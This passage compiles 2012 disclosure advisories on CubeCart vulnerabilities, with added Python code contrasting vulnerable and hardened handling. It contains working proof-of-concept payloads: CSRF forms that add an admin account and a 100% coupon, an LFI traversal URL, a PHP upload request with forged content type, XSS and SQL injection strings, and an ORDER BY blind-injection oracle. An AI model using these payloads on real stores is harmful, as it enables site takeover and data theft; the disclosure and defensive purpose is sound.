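    if urlsplit(urljoin(SITE_ORIGIN + "/", redir)).netloc != urlsplit(SITE_ORIGIN).netloc:
        return default
    # Rebuild from components so only path, query and fragment survive.
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    for candidate in ["//yehg.net/%3f", "/admin.php?_g=products", "http://evil.example/",
                      "javascript:alert(1)", "/\\evil.example", "admin.php"]:
        print(f"{candidate!r:32} -> {safe_redirect_target(candidate)}")
```

Where a redirect genuinely has to reach another host, the right shape is an allowlist of destinations (or a lookup key that maps to one), not a filter over free-form URLs.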


6. SOLUTION

Upgrade to the latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability reported
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_open_url_redirection
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-24]



[Full-disclosure] CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

CubeCart is an out-of-the-box ecommerce shopping cart software
solution written to run on servers that have PHP & MySQL support.
With CubeCart you can quickly set up a powerful online store which can
be used to sell digital or tangible products to new and existing
customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows an
attacker to conduct Cross Site Scripting attacks. This may allow an
attacker to create a specially crafted URL that would execute arbitrary
script code in a victim's browser.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URLs and Parameters

/admin.php (countiesPage parameter)
/admin.php (countriesPage parameter)
/admin.php (dStart parameter)
/admin.php (edit parameter)
/admin.php (email parameter)
/admin.php (FCKeditor parameter)
/admin.php (gc%5Bmax%5D parameter)
/admin.php (gc%5Bmin%5D parameter)
/admin.php (gc%5BproductCode%5D parameter)
/admin.php (gc%5Bweight%5D parameter)
/admin.php (gc[max] parameter)
/admin.php (gc[min] parameter)
/admin.php (gc[productCode] parameter)
/admin.php (gc[weight] parameter)
/admin.php (loc parameter)
/admin.php (page parameter)
/admin.php (prod_master_id parameter)
/admin.php (searchStr parameter)
/admin.php (thumbName[] parameter)
/admin.php (User-Agent HTTP header)
/admin.php (yStart parameter)
/index.php (Referer HTTP header)
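The list above, like the CubeCart 5.x and Open-Realty XSS lists earlier on this page, mixes URL-encoded parameter names (gc%5Bmax%5D) with their decoded form (gc[max]) and includes request headers (User-Agent, Referer). The following is an added example, not vendor code, of what the fix looks like for such reflected values: decode the request once, then encode every value for the context it lands in (HTML attribute, HTML text, URL query component), treating headers as untrusted input like any parameter. The templates and the query string are constructed.

```python
"""Context-aware output encoding for reflected request parameters and
headers.  Added example, not vendor code; templates and inputs are
constructed."""
import html
from urllib.parse import parse_qs, quote

# Constructed request: the same parameter arrives URL-encoded (gc%5Bmax%5D)
# or raw (gc[max]); parse_qs decodes both to the same key, so filtering and
# encoding must run on the decoded value, never on the raw query string.
CONSTRUCTED_QUERY = ("gc%5Bmax%5D=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
                     "&searchStr=shoes%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E")


def parse_request(query_string):
    """Decode a query string into {name: [values]}; %5B/%5D become [ ]."""
    return parse_qs(query_string, keep_blank_values=True)


def param(params, key):
    return params.get(key, [""])[0]


def attr(value):
    """Escape for HTML text and attribute contexts; quote=True also covers ' and "."""
    return html.escape(value, quote=True)


def render_unsafe(params, user_agent):
    """What a template that concatenates raw input produces."""
    return (f'<input name="gc[max]" value="{param(params, "gc[max]")}">\n'
            f'<p>Results for {param(params, "searchStr")}</p>\n'
            f'<a href="/admin.php?searchStr={param(params, "searchStr")}">again</a>\n'
            f'<span>{user_agent}</span>')


def render_safe(params, user_agent):
    """Same template, each value encoded for the context it lands in:
    entity escaping for attribute and text nodes, percent-encoding for the
    URL query component, and the User-Agent header handled like a parameter."""
    return (f'<input name="gc[max]" value="{attr(param(params, "gc[max]"))}">\n'
            f'<p>Results for {attr(param(params, "searchStr"))}</p>\n'
            f'<a href="/admin.php?searchStr={quote(param(params, "searchStr"), safe="")}">again</a>\n'
            f'<span>{attr(user_agent)}</span>')


def has_injected_markup(rendered):
    """True if a raw tag from the inputs survived into the output."""
    low = rendered.lower()
    return "<script" in low or "<img" in low


if __name__ == "__main__":
    params = parse_request(CONSTRUCTED_QUERY)
    ua = "Mozilla/5.0 <script>alert(1)</script>"
    print("unsafe injected:", has_injected_markup(render_unsafe(params, ua)))
    print("safe injected:  ", has_injected_markup(render_safe(params, ua)))
    print(render_safe(params, ua))
```

Escaping at output time is what makes the fix complete: a filter applied at input time would have to anticipate every encoding the value may arrive in, while the output encoder only needs to know the context it writes into.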


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance cycle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_xss
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]



[Full-disclosure] CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 4.4.6 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

CubeCart is an out-of-the-box ecommerce shopping cart software
solution written to run on servers that have PHP & MySQL support.
With CubeCart you can quickly set up a powerful online store which can
be used to sell digital or tangible products to new and existing
customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows an
attacker to conduct SQL Injection attacks. This could allow an attacker
to inject or manipulate SQL queries in the back-end database, allowing
for the manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URLs and Parameters

/admin.php (active parameter)
/admin.php (cat_id parameter)
/admin.php (orderCol parameter)
/admin.php (orderDir parameter)
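Two of the parameters above (cat_id, active) are values and two (orderCol, orderDir) are SQL identifiers, which matters for the fix: values can be bound as query parameters, identifiers cannot and need an allowlist. The following is an added example, not CubeCart code, that shows the string-built query such parameters would reach beside a version that binds the values and allowlists the ORDER BY clause; the products table and its rows are constructed.

```python
"""Parameterised query with an allowlisted ORDER BY, next to the
string-built query the advisory's parameters (cat_id, active, orderCol,
orderDir) would reach.  Added example, not CubeCart code; the table and rows
are constructed."""
import sqlite3

ORDER_COLUMNS = {"name", "price", "updated"}   # the only sortable columns
ORDER_DIRS = {"ASC", "DESC"}


def setup_demo_db():
    """In-memory products table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL, "
                 "cat_id INTEGER, active INTEGER, updated TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Anvil",  9.5, 1, 1, "2012-12-01"),
        (2, "Bolt",   0.2, 1, 0, "2012-12-02"),
        (3, "Chain",  4.0, 2, 1, "2012-12-03"),
        (4, "Drill", 59.0, 2, 1, "2012-12-04"),
        (5, "Easel", 30.0, 3, 0, "2012-12-05"),
    ])
    return conn


def list_products_vulnerable(conn, cat_id, active, order_col, order_dir):
    """Request values interpolated straight into SQL: every parameter is injectable."""
    sql = ("SELECT id, name FROM products WHERE cat_id = %s AND active = %s "
           "ORDER BY %s %s" % (cat_id, active, order_col, order_dir))
    return conn.execute(sql).fetchall()


def list_products_safe(conn, cat_id, active, order_col="name", order_dir="ASC"):
    """Values go through bound parameters; identifiers (which cannot be
    bound) are checked against a fixed allowlist before being spliced in."""
    if order_col not in ORDER_COLUMNS:
        raise ValueError("unknown sort column")
    direction = order_dir.upper()
    if direction not in ORDER_DIRS:
        raise ValueError("unknown sort direction")
    try:
        cat, act = int(cat_id), int(active)
    except (TypeError, ValueError):
        raise ValueError("cat_id and active must be integers") from None
    sql = (f"SELECT id, name FROM products WHERE cat_id = ? AND active = ? "
           f"ORDER BY {order_col} {direction}")
    return conn.execute(sql, (cat, act)).fetchall()


if __name__ == "__main__":
    conn = setup_demo_db()
    # cat_id "1 OR 1=1" turns the WHERE into "cat_id = 1 OR (1=1 AND active = 1)"
    # and returns rows from other categories.
    print(list_products_vulnerable(conn, "1 OR 1=1", "1", "name", "ASC"))
    print(list_products_safe(conn, "1", "1"))
```

The same split applies to every query on the list: anything that names a column or table is an identifier and goes through an allowlist, everything else is a value and goes through a placeholder.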


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance cycle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_sqli
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]


[Full-disclosure] CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Request
Forgery (CSRF).


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions in the majority of
administrator functions, such as adding a new user or granting a user
administrative privileges. By using a crafted URL, an attacker may
trick the victim into visiting his web page to take advantage of the
trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Proof-of-Concept


Add Admin User
==
<form action="http://localhost/admin.php?_g=adminusers/administrators" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="name" value="hacker" />
  <input type="hidden" name="adminUsername" value="hacker" />
  <input type="hidden" name="email" value="hacker&#64;yehg&#46;net" />
  <input type="hidden" name="adminPassword" value="h&#64;ck3er" />
  <input type="hidden" name="adminPassword&#95;verify" value="h&#64;ck3er" />
  <input type="hidden" name="isSuper" value="&#45;" />
  <input type="hidden" name="notes" value="&#13;" />
  <input type="hidden" name="adminId" value="&#13;" />
  <input type="hidden" name="Submit" value="Add&#32;User" />
  <input type="submit" value="Submit form" />
</form>

Add Coupon
==
<form action="http://localhost/admin.php?_g=products/coupons" method="POST">
  <input type="hidden" name="code" value="HACKER" />
  <input type="hidden" name="discount&#95;percent" value="100" />
  <input type="hidden" name="discount&#95;price" value="" />
  <input type="hidden" name="expires" value="3000&#47;12&#47;30" />
  <input type="hidden" name="allowed&#95;uses" value="0" />
  <input type="hidden" name="count" value="0" />
  <input type="hidden" name="desc" value="0" />
  <input type="hidden" name="id" value="" />
  <input type="hidden" name="Submit" value="Edit&#32;Coupon" />
  <input type="submit" value="Submit form" />
</form>



6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance cycle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_csrf
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/

#yehg [2012-12-24]



[Full-disclosure] CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Local File Inclusion.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that may allow a
remote attacker to execute arbitrary commands or code. The issue is
due to the '/admin.php' script not properly sanitizing user input,
specifically directory traversal style attacks (e.g., ../../) supplied
to the 'loc' parameter. This may allow an attacker to include a file
from the targeted host that contains arbitrary commands or code that
will be executed by the vulnerable script. Such attacks are limited
due to the script only calling files already on the target host. In
addition, this flaw can potentially be used to disclose the contents
of any file on the system accessible by the web server.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URL and Parameter

/admin.php (loc parameter)
/admin.php?_g=filemanager/language&loc=/../../../public_ftp/uploads/hack.inc.php
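The fix for a traversal-style include is not to strip "../" sequences but to refuse anything that is not a bare file name inside the intended directory and to compare canonical paths. The following is an added example in Python (not CubeCart code): it builds a constructed directory tree that mimics the advisory's paths, shows the flawed include pattern reading the uploaded hack.inc.php, and then a hardened resolver that rejects the same payload. The directory depth and file names are assumptions.

```python
import tempfile
from pathlib import Path


def build_demo_tree():
    """Constructed directory layout standing in for a CubeCart install (sample files,
    not the real product). The depth is chosen so that three '..' steps from the
    language directory land at the web root, matching the advisory's payload."""
    root = Path(tempfile.mkdtemp())
    lang = root / "admin" / "includes" / "language"
    lang.mkdir(parents=True)
    (lang / "en.php").write_text("<?php $lang['hello'] = 'Hello'; ?>")
    uploads = root / "public_ftp" / "uploads"
    uploads.mkdir(parents=True)
    (uploads / "hack.inc.php").write_text("<?php /* attacker-controlled code */ ?>")
    return root, lang


def include_vulnerable(lang_dir, loc):
    """The flawed pattern: include($lang_dir . $loc) with loc taken from the request.
    Traversal sequences in loc walk out of the language directory."""
    target = Path(str(lang_dir) + "/" + loc.lstrip("/"))
    return target.resolve().read_text()


def resolve_language_file(lang_dir, loc):
    """Hardened resolution. Accepts only a bare '<name>.php' that exists directly
    inside lang_dir; rejects directory components, dotfiles, other extensions and
    symlinks that resolve outside the directory."""
    base = Path(lang_dir).resolve()
    name = loc.lstrip("/")
    if (not name or Path(name).name != name
            or name.startswith(".") or not name.endswith(".php")):
        raise ValueError(f"rejected loc value: {loc!r}")
    candidate = (base / name).resolve()   # resolve() follows symlinks
    if candidate.parent != base:
        raise ValueError(f"loc escapes the language directory: {loc!r}")
    if not candidate.is_file():
        raise FileNotFoundError(name)
    return candidate


def include_fixed(lang_dir, loc):
    return resolve_language_file(lang_dir, loc).read_text()


if __name__ == "__main__":
    root, lang = build_demo_tree()
    payload = "/../../../public_ftp/uploads/hack.inc.php"
    print("vulnerable include returned:", include_vulnerable(lang, payload))
    try:
        include_fixed(lang, payload)
    except ValueError as err:
        print("hardened include refused:", err)
```

The check on `candidate.parent != base` is what makes this robust against symlinks dropped into the language directory, which a pure string filter on "../" would miss.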


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance cycle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_lfi
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]


[Full-disclosure] CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.x and 5.x versions are vulnerable to Setup Re-installation
Privilege Escalation.

2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 4.x and 5.x versions contain a flaw: the set-up installation
directory is neither removed after installation nor is its continued
existence flagged to the administrator. This allows an attacker to
re-run the installer, gain administrator access and perform malicious
actions such as uploading a web shell to compromise the application server.

4. VERSIONS AFFECTED

CubeCart 4.x and 5.x

5. Affected URL

N.A

6. SOLUTION/WORKAROUND

The vendor has chosen not to fix the issue.
The workaround is to remove the setup directory after installation.

7. VENDOR

CubeCart Development Team
http://cubecart.com/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability Reported
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4x5x%5D_setup_re-install-priv-esclate
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-24]


[Full-disclosure] CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that allows a remote
cross site redirection attack. This flaw exists because the
application does not properly sanitise the r and redir parameters.
This allows an attacker to create a specially crafted URL that, if
clicked, would redirect a victim from the intended legitimate web site
to an arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URLs and Parameters

/index.php (r parameter)
/index.php (redir parameter)

/index.php?_g=sw&r=//yehg.net/
/index.php?_a=login&redir=//yehg.net


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-06-22: CubeCart 4.x in End-of-Support/Maintenance cycle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_open_url_redirection
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]



[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities

2012-12-23 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows an attacker
to conduct SQL injection attacks. This could allow an attacker to inject
or manipulate SQL queries in the back-end database, allowing for the
manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. Affected URLs and Parameters

/cube/admin/products/extraCats.php (add parameter)
/cube/admin/products/index.php (cat_id parameter)
/cube/admin/products/index.php (category parameter)
/cube/admin/products/index.php (orderCol parameter)
/cube/admin/products/index.php (orderDir parameter)
/cube/admin/products/options.php (masterProduct parameter)
/cube/admin/settings/currency.php (active parameter)
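The orderCol and orderDir parameters listed here, and in the 4.4.6 advisory above, are the instructive case: a sort column or direction cannot be passed as a bound parameter, so escaping does not help and the only sound fix is an allowlist. The following is an added example in Python with SQLite (not CubeCart code; the products table and column names are assumptions). It shows the interpolating query, how ORDER BY alone can be turned into a boolean oracle even though it never returns attacker data, and the hardened version that binds the value and allowlists the identifiers.

```python
import sqlite3

# Constructed sample schema standing in for a product table; names are assumptions.
SCHEMA = """
CREATE TABLE products (product_id INTEGER PRIMARY KEY, cat_id INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (1, 10, 'Widget', 9.99), (2, 10, 'Gadget', 19.99), (3, 20, 'Gizmo', 4.50);
"""
ALLOWED_ORDER_COLS = {"product_id", "name", "price"}
ALLOWED_ORDER_DIRS = {"ASC", "DESC"}


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def list_products_vulnerable(con, cat_id, order_col, order_dir):
    """The flawed pattern: every request parameter is interpolated into the SQL text."""
    sql = (f"SELECT product_id, name FROM products WHERE cat_id = {cat_id} "
           f"ORDER BY {order_col} {order_dir}")
    return con.execute(sql).fetchall()


def order_by_oracle(con, condition_sql):
    """Boolean inference through the orderCol injection point: ORDER BY cannot
    return attacker data directly, but the resulting row order reveals whether
    `condition_sql` evaluated true (name order vs. price order)."""
    injected = f"(CASE WHEN ({condition_sql}) THEN name ELSE price END)"
    rows = list_products_vulnerable(con, 10, injected, "ASC")
    # name order puts Gadget first; price order puts Widget (9.99) first
    return rows[0][1] == "Gadget"


def list_products_fixed(con, cat_id, order_col, order_dir):
    """Values are bound as parameters; identifiers and keywords are allowlisted,
    because ORDER BY columns and directions cannot be bound."""
    try:
        cat_id = int(cat_id)
    except (TypeError, ValueError):
        raise ValueError(f"cat_id must be an integer: {cat_id!r}")
    if order_col not in ALLOWED_ORDER_COLS:
        raise ValueError(f"unexpected orderCol: {order_col!r}")
    order_dir = str(order_dir).upper()
    if order_dir not in ALLOWED_ORDER_DIRS:
        raise ValueError(f"unexpected orderDir: {order_dir!r}")
    sql = (f"SELECT product_id, name FROM products WHERE cat_id = ? "
           f"ORDER BY {order_col} {order_dir}")
    return con.execute(sql, (cat_id,)).fetchall()


if __name__ == "__main__":
    con = connect()
    print("cat_id injection:", list_products_vulnerable(con, "10 OR 1=1", "product_id", "ASC"))
    print("oracle 1=1:", order_by_oracle(con, "1=1"), " oracle 1=2:", order_by_oracle(con, "1=2"))
    print("fixed:", list_products_fixed(con, "10", "name", "asc"))
```

The oracle function is the reason an "it is only a sort order" parameter still matters: one true/false bit per request is enough to extract the whole database with a conditional subquery.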


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance cycle
2012-12-22: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_sqli
CubeCart Home Page: http://cubecart.com/


#yehg [2012-12-22]



[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload

2012-12-22 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 3.0.20 and lower versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 3.0.20 and lower versions contain a flaw related to the
/admin/filemanager/upload.php script's failure to properly validate
uploaded files. This may allow a remote attacker to upload arbitrary
files and execute arbitrary code via a request to the 'atm-regen'
parameter.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

Set the Content-Type of the file part to image/jpeg and upload.
Uploaded files are stored under images/uploads.


/
POST /cube/admin/filemanager/upload.php HTTP/1.1
Host: localhost
Referer: http://localhost/cube/admin/filemanager/upload.php?custom=1&redir=0
Cookie: ccSIDb4c410adddf67168ce2ac0e2807326f8=f2c0bc69b813778a644b76c2b40c7ce0;
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 29

-----------------------------24464570528145
Content-Disposition: form-data; name="FCKeditor_File"; filename="cmd.php"
Content-Type: image/jpeg

<?php phpinfo(); ?>

-----------------------------24464570528145
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------24464570528145
Content-Disposition: form-data; name="redir"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="custom"

1
-----------------------------24464570528145--

///
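The PoC works because the only thing the upload handler looks at is the Content-Type line inside the multipart part, which the client writes. The following is an added example in Python (not CubeCart code) that parses a constructed multipart body shaped like the request above with the standard library, shows the client-trusting check accepting cmd.php, and then a hardened validator that allowlists the extension, sniffs the magic bytes, refuses embedded PHP tags and stores under a server-generated name. The field and file names are taken from the PoC; the image signatures and the storage-name scheme are assumptions.

```python
import secrets
from dataclasses import dataclass
from email import policy
from email.parser import BytesParser

# Constructed multipart body in the shape of the advisory's PoC request (sample data).
POC_BOUNDARY = "---------------------------24464570528145"
POC_CONTENT_TYPE = f"multipart/form-data; boundary={POC_BOUNDARY}"
POC_BODY = (
    f"--{POC_BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="FCKeditor_File"; filename="cmd.php"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "<?php phpinfo(); ?>\r\n"
    f"--{POC_BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="submit"\r\n\r\n'
    "Upload Image\r\n"
    f"--{POC_BOUNDARY}--\r\n"
).encode()

# Allowed extensions and the magic bytes a file with that extension must start with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


@dataclass
class Upload:
    filename: str       # client-supplied
    content_type: str   # client-supplied, freely forgeable
    data: bytes


def parse_multipart(content_type, body):
    """Parse a multipart/form-data body into {field name: Upload} with the stdlib
    email parser; the boundary is taken from the Content-Type header."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = Upload(
            filename=part.get_filename() or "",
            content_type=part.get_content_type(),
            data=part.get_payload(decode=True) or b"",
        )
    return fields


def accept_vulnerable(upload):
    """The flawed check: trusts the Content-Type the client sent."""
    return upload.content_type.startswith("image/")


def validate_upload(upload):
    """Hardened check. Returns the server-chosen storage name or raises ValueError."""
    _, dot, ext = upload.filename.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:
        raise ValueError(f"extension not allowed: {upload.filename!r}")
    if not upload.data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match the claimed image type")
    if b"<?" in upload.data or b"<script" in upload.data.lower():
        raise ValueError("script content embedded in image")
    # Never reuse the client's name: 'cmd.php.jpg' can still be handled as PHP
    # by a permissive AddHandler configuration, so store under a random name.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    shell = parse_multipart(POC_CONTENT_TYPE, POC_BODY)["FCKeditor_File"]
    print("vulnerable check accepts cmd.php:", accept_vulnerable(shell))
    try:
        validate_upload(shell)
    except ValueError as err:
        print("hardened check refused:", err)
```

Store the file outside the web root or in a directory with script execution disabled as well; the validator reduces what gets written, but the execution policy of the upload directory is what ultimately decides whether a slip-through becomes code execution.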


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance cycle
2012-12-22: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_arbitrary_file_upload
CubeCart Home Page: http://cubecart.com/


#yehg [2012-12-22]



[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities

2012-12-22 Thread YGN Ethical Hacker Group
 (folder parameter)
/admin/modules/gateway/PayOffline/index.php (module parameter)
/admin/modules/gateway/PayPal/index.php (folder parameter)
/admin/modules/gateway/PayPal/index.php (module parameter)
/admin/modules/gateway/Print_Order_Form/index.php   (folder parameter)
/admin/modules/gateway/Print_Order_Form/index.php   (module parameter)
/admin/modules/gateway/Protx/index.php  (folder parameter)
